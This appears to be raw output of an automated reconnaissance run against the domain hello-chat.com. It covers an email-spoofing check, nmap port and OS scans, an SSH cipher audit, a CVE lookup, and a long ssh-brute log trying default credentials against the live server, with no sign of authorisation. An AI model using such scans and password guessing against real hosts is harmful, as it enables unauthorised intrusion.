1488hello-chat.com
1489www.hello-chat.com
1490#################################################################################################################################
1491[+] hello-chat.com has no SPF record!
1492[*] No DMARC record found. Looking for organizational record
1493[+] No organizational DMARC record
1494[+] Spoofing possible for hello-chat.com!
1495#################################################################################################################################
1496WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
1497Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 20:51 EDT
1498Nmap scan report for hello-chat.com (199.38.245.243)
1499Host is up (0.25s latency).
1500Not shown: 482 closed ports
1501PORT STATE SERVICE
150221/tcp open ftp
150322/tcp open ssh
150425/tcp open smtp
150553/tcp open domain
150680/tcp open http
1507110/tcp open pop3
1508143/tcp open imap
1509443/tcp open https
1510465/tcp open smtps
1511587/tcp open submission
1512993/tcp open imaps
1513995/tcp open pop3s
15142222/tcp open EtherNetIP-1
15153306/tcp open mysql
1516
1517Nmap done: 1 IP address (1 host up) scanned in 2.55 seconds
1518#################################################################################################################################
1519Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 20:52 EDT
1520Nmap scan report for hello-chat.com (199.38.245.243)
1521Host is up (0.25s latency).
1522
1523PORT STATE SERVICE
152453/udp open domain
152567/udp open|filtered dhcps
152668/udp open|filtered dhcpc
152769/udp open|filtered tftp
152888/udp open|filtered kerberos-sec
1529123/udp open|filtered ntp
1530137/udp open|filtered netbios-ns
1531138/udp open|filtered netbios-dgm
1532139/udp open|filtered netbios-ssn
1533161/udp open|filtered snmp
1534162/udp open|filtered snmptrap
1535389/udp open|filtered ldap
1536500/udp open|filtered isakmp
1537520/udp open|filtered route
15382049/udp open|filtered nfs
1539
1540Nmap done: 1 IP address (1 host up) scanned in 5.68 seconds
1541#################################################################################################################################
1542Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 20:52 EDT
1543NSE: Loaded 54 scripts for scanning.
1544NSE: Script Pre-scanning.
1545Initiating NSE at 20:52
1546Completed NSE at 20:52, 0.00s elapsed
1547Initiating NSE at 20:52
1548Completed NSE at 20:52, 0.00s elapsed
1549Initiating Parallel DNS resolution of 1 host. at 20:52
1550Completed Parallel DNS resolution of 1 host. at 20:52, 0.02s elapsed
1551Initiating SYN Stealth Scan at 20:52
1552Scanning hello-chat.com (199.38.245.243) [1 port]
1553Discovered open port 21/tcp on 199.38.245.243
1554Completed SYN Stealth Scan at 20:52, 0.29s elapsed (1 total ports)
1555Initiating Service scan at 20:52
1556Scanning 1 service on hello-chat.com (199.38.245.243)
1557Completed Service scan at 20:52, 0.48s elapsed (1 service on 1 host)
1558Initiating OS detection (try #1) against hello-chat.com (199.38.245.243)
1559Retrying OS detection (try #2) against hello-chat.com (199.38.245.243)
1560Initiating Traceroute at 20:52
1561Completed Traceroute at 20:52, 3.16s elapsed
1562Initiating Parallel DNS resolution of 11 hosts. at 20:52
1563Completed Parallel DNS resolution of 11 hosts. at 20:52, 0.23s elapsed
1564NSE: Script scanning 199.38.245.243.
1565Initiating NSE at 20:52
1566Completed NSE at 20:53, 90.34s elapsed
1567Initiating NSE at 20:53
1568Completed NSE at 20:53, 0.05s elapsed
1569Nmap scan report for hello-chat.com (199.38.245.243)
1570Host is up (0.25s latency).
1571
1572PORT STATE SERVICE VERSION
157321/tcp open ftp Pure-FTPd
1574Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1575Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Linux 3.8 (90%), Crestron XPanel control system (90%), Adtran 424RG FTTH gateway (89%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Linux 2.6.39 - 3.2 (89%)
1576No exact OS matches for host (test conditions non-ideal).
1577Uptime guess: 38.029 days (since Sun Feb 9 19:12:11 2020)
1578Network Distance: 15 hops
1579TCP Sequence Prediction: Difficulty=261 (Good luck!)
1580IP ID Sequence Generation: All zeros
1581
1582TRACEROUTE (using port 21/tcp)
1583HOP RTT ADDRESS
15841 136.77 ms 10.203.41.1
15852 ...
15863 136.86 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
15874 136.84 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
15885 141.68 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
15896 164.40 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
15907 169.21 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
15918 238.68 ms be12266.ccr42.par01.atlas.cogentco.com (154.54.56.174)
15929 235.82 ms be2490.ccr42.jfk02.atlas.cogentco.com (154.54.42.85)
159310 238.69 ms be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122)
159411 244.23 ms be2273.rcr21.ewr03.atlas.cogentco.com (154.54.83.206)
159512 ... 14
159615 242.54 ms 199.38.245.243
1597
1598NSE: Script Post-scanning.
1599Initiating NSE at 20:53
1600Completed NSE at 20:53, 0.00s elapsed
1601Initiating NSE at 20:53
1602Completed NSE at 20:53, 0.00s elapsed
1603#################################################################################################################################
1604# general
1605(gen) banner: SSH-2.0-OpenSSH_5.3
1606(gen) software: OpenSSH 5.3
1607(gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
1608(gen) compression: enabled (zlib@openssh.com)
1609
1610# key exchange algorithms
1611(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
1612 `- [info] available since OpenSSH 4.4
1613(kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1614 `- [warn] using weak hashing algorithm
1615 `- [info] available since OpenSSH 2.3.0
1616(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
1617 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
1618(kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1619 `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
1620 `- [warn] using small 1024-bit modulus
1621 `- [warn] using weak hashing algorithm
1622 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
1623
1624# host-key algorithms
1625(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
1626(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
1627 `- [warn] using small 1024-bit modulus
1628 `- [warn] using weak random number generator could reveal the key
1629 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1630
1631# encryption algorithms (ciphers)
1632(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1633(enc) aes192-ctr -- [info] available since OpenSSH 3.7
1634(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1635(enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1636 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1637 `- [warn] using weak cipher
1638 `- [info] available since OpenSSH 4.2
1639(enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1640 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1641 `- [warn] using weak cipher
1642 `- [info] available since OpenSSH 4.2
1643(enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1644 `- [warn] using weak cipher mode
1645 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
1646(enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1647 `- [warn] using weak cipher
1648 `- [warn] using weak cipher mode
1649 `- [warn] using small 64-bit block size
1650 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
1651(enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1652 `- [fail] disabled since Dropbear SSH 0.53
1653 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1654 `- [warn] using weak cipher mode
1655 `- [warn] using small 64-bit block size
1656 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
1657(enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1658 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1659 `- [warn] using weak cipher mode
1660 `- [warn] using small 64-bit block size
1661 `- [info] available since OpenSSH 2.1.0
1662(enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1663 `- [warn] using weak cipher mode
1664 `- [info] available since OpenSSH 2.3.0
1665(enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1666 `- [warn] using weak cipher mode
1667 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
1668(enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1669 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1670 `- [warn] using weak cipher
1671 `- [info] available since OpenSSH 2.1.0
1672(enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1673 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1674 `- [warn] using weak cipher mode
1675 `- [info] available since OpenSSH 2.3.0
1676
1677# message authentication code algorithms
1678(mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1679 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1680 `- [warn] using encrypt-and-MAC mode
1681 `- [warn] using weak hashing algorithm
1682 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1683(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
1684 `- [warn] using weak hashing algorithm
1685 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1686(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
1687 `- [warn] using small 64-bit tag size
1688 `- [info] available since OpenSSH 4.7
1689(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
1690 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1691(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
1692 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1693(mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1694 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1695 `- [warn] using encrypt-and-MAC mode
1696 `- [info] available since OpenSSH 2.5.0
1697(mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1698 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1699 `- [warn] using encrypt-and-MAC mode
1700 `- [info] available since OpenSSH 2.1.0
1701(mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1702 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1703 `- [warn] using encrypt-and-MAC mode
1704 `- [warn] using weak hashing algorithm
1705 `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
1706(mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1707 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1708 `- [warn] using encrypt-and-MAC mode
1709 `- [warn] using weak hashing algorithm
1710 `- [info] available since OpenSSH 2.5.0
1711
1712# algorithm recommendations (for OpenSSH 5.3)
1713(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
1714(rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
1715(rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
1716(rec) -ssh-dss -- key algorithm to remove
1717(rec) -arcfour -- enc algorithm to remove
1718(rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
1719(rec) -blowfish-cbc -- enc algorithm to remove
1720(rec) -3des-cbc -- enc algorithm to remove
1721(rec) -aes256-cbc -- enc algorithm to remove
1722(rec) -arcfour256 -- enc algorithm to remove
1723(rec) -cast128-cbc -- enc algorithm to remove
1724(rec) -aes192-cbc -- enc algorithm to remove
1725(rec) -arcfour128 -- enc algorithm to remove
1726(rec) -aes128-cbc -- enc algorithm to remove
1727(rec) -hmac-md5-96 -- mac algorithm to remove
1728(rec) -hmac-ripemd160 -- mac algorithm to remove
1729(rec) -hmac-sha1-96 -- mac algorithm to remove
1730(rec) -umac-64@openssh.com -- mac algorithm to remove
1731(rec) -hmac-md5 -- mac algorithm to remove
1732(rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
1733(rec) -hmac-sha1 -- mac algorithm to remove
1734#################################################################################################################################
1735Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 20:54 EDT
1736NSE: Loaded 51 scripts for scanning.
1737NSE: Script Pre-scanning.
1738Initiating NSE at 20:54
1739Completed NSE at 20:54, 0.00s elapsed
1740Initiating NSE at 20:54
1741Completed NSE at 20:54, 0.00s elapsed
1742Initiating Parallel DNS resolution of 1 host. at 20:54
1743Completed Parallel DNS resolution of 1 host. at 20:54, 0.02s elapsed
1744Initiating SYN Stealth Scan at 20:54
1745Scanning hello-chat.com (199.38.245.243) [1 port]
1746Discovered open port 22/tcp on 199.38.245.243
1747Completed SYN Stealth Scan at 20:54, 0.28s elapsed (1 total ports)
1748Initiating Service scan at 20:54
1749Scanning 1 service on hello-chat.com (199.38.245.243)
1750Completed Service scan at 20:54, 0.50s elapsed (1 service on 1 host)
1751Initiating OS detection (try #1) against hello-chat.com (199.38.245.243)
1752Retrying OS detection (try #2) against hello-chat.com (199.38.245.243)
1753Initiating Traceroute at 20:54
1754Completed Traceroute at 20:54, 3.17s elapsed
1755Initiating Parallel DNS resolution of 11 hosts. at 20:54
1756Completed Parallel DNS resolution of 11 hosts. at 20:54, 0.34s elapsed
1757NSE: Script scanning 199.38.245.243.
1758Initiating NSE at 20:54
1759NSE: [ssh-run 199.38.245.243:22] Failed to specify credentials and command to run.
1760NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:root
1761NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:admin
1762NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:administrator
1763NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:webadmin
1764NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:sysadmin
1765NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:netadmin
1766NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:guest
1767NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:user
1768NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:web
1769NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:test
1770NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:
1771NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:
1772NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:
1773NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:
1774NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:
1775NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:
1776NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:
1777NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:
1778NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:
1779NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:
1780NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:123456
1781NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:123456
1782NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:123456
1783NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:123456
1784NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:123456
1785NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:123456
1786NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:123456
1787NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:123456
1788NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:123456
1789NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:123456
1790NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:12345
1791NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:12345
1792NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:12345
1793NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:12345
1794NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:12345
1795NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:12345
1796NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:12345
1797NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:12345
1798NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:12345
1799NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:12345
1800NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:123456789
1801NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:123456789
1802NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:123456789
1803NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:123456789
1804NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:123456789
1805NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:123456789
1806NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:123456789
1807NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:123456789
1808NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:123456789
1809NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:123456789
1810NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:password
1811NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:password
1812NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:password
1813NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:password
1814NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:password
1815NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:password
1816NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:password
1817NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:password
1818NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:password
1819NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:password
1820NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:iloveyou
1821NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:iloveyou
1822NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:iloveyou
1823NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:iloveyou
1824NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:iloveyou
1825NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:iloveyou
1826NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:iloveyou
1827NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:iloveyou
1828NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:iloveyou
1829NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:iloveyou
1830NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:princess
1831NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:princess
1832NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:princess
1833NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:princess
1834NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:princess
1835NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:princess
1836NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:princess
1837NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:princess
1838NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:princess
1839NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:princess
1840NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:12345678
1841NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:12345678
1842NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:12345678
1843NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:12345678
1844NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:12345678
1845NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:12345678
1846NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:12345678
1847NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:12345678
1848NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:12345678
1849NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:12345678
1850NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:1234567
1851NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:1234567
1852NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:1234567
1853NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:1234567
1854NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:1234567
1855NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:1234567
1856NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:1234567
1857NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:1234567
1858NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:1234567
1859NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:1234567
1860NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:abc123
1861NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:abc123
1862NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:abc123
1863NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:abc123
1864NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:abc123
1865NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:abc123
1866NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:abc123
1867NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:abc123
1868NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:abc123
1869NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:abc123
1870NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:nicole
1871NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:nicole
1872NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:nicole
1873NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:nicole
1874NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:nicole
1875NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:nicole
1876NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:nicole
1877NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:nicole
1878NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:nicole
1879NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:nicole
1880NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:daniel
1881NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:daniel
1882NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:daniel
1883NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:daniel
1884NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:daniel
1885NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:daniel
1886NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:daniel
1887NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:daniel
1888NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:daniel
1889NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:daniel
1890NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:monkey
1891NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:monkey
1892NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:monkey
1893NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:monkey
1894NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:monkey
1895NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:monkey
1896NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:monkey
1897NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:monkey
1898NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:monkey
1899NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:monkey
1900NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:babygirl
1901NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:babygirl
1902NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:babygirl
1903NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:babygirl
1904NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:babygirl
1905NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:babygirl
1906NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:babygirl
1907NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:babygirl
1908NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:babygirl
1909NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:babygirl
1910NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:qwerty
1911NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:qwerty
1912NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:qwerty
1913NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:qwerty
1914NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:qwerty
1915NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:qwerty
1916NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:qwerty
1917NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:qwerty
1918NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:qwerty
1919NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:qwerty
1920NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:lovely
1921NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: admin:lovely
1922NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: administrator:lovely
1923NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: webadmin:lovely
1924NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: sysadmin:lovely
1925NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: netadmin:lovely
1926NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: guest:lovely
1927NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: user:lovely
1928NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: web:lovely
1929NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: test:lovely
1930NSE: [ssh-brute 199.38.245.243:22] Trying username/password pair: root:654321
1931Completed NSE at 20:56, 91.22s elapsed
1932Initiating NSE at 20:56
1933Completed NSE at 20:56, 0.05s elapsed
1934Nmap scan report for hello-chat.com (199.38.245.243)
1935Host is up (0.24s latency).
1936
1937PORT STATE SERVICE VERSION
193822/tcp open ssh OpenSSH 5.3 (protocol 2.0)
1939| ssh-auth-methods:
1940| Supported authentication methods:
1941| publickey
1942| gssapi-keyex
1943| gssapi-with-mic
1944|_ password
1945| ssh-hostkey:
1946| 1024 1a:0d:eb:77:2b:24:04:b9:fb:ff:06:3a:d3:de:0b:fc (DSA)
1947|_ssh-dss AAAAB3NzaC1kc3MAAACBAIMRQXD+1oPRI+06ZM4KtSMGXho0l8VwjE1hipFxVinRSdmBA0Q9GlAGKRmGjjX3ZwZiVzLnoBLtRlk2Zp/l7p96u5tIVGuIecTzyqk30DmDXVkZ4pUmfXk7kPy92+zdS7bMn4oebf0RDU1E3ei/yWRvPnrjNHDDgtcGB/YVzO25AAAAFQDnIq5UcsCaimz/N99rd2peNfHQ4wAAAIEAghYoF1AyLZ7+U6b+hT6y5YGKXDRtYzFltZQRYH4mOFUI2eB5aoCAoQhTrZdsWTuWFebO+uNSuQKr8tHX1pIA6du/4stMkZjjW2sQRNRgROroRMvu4mEamJSiv6t4F7IYBppj60xkvjo8H03fOVK3cgcVps7CHMLMpmDWzqrUkeUAAACAKG1yALmzMtCrc5Q4OGPqhF2D5xiGkQaeJymZ83goR74crSSPnV90i5dVlhqs8e7e8lyfC0KPGwJQnYAJYNOG6tcoUkZfPVCfXtTnFP0svesuRv9iCuVhSBB8QZeSvCI8sj17RhE3mfpmTsuGromHeXzYqVIimCUMRMSfSL6iaqo=
1948| ssh-publickey-acceptance:
1949|_ Accepted Public Keys: No public keys accepted
1950|_ssh-run: Failed to specify credentials and command to run.
1951| vulners:
1952| cpe:/a:openbsd:openssh:5.3:
1953| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
1954| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
1955| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
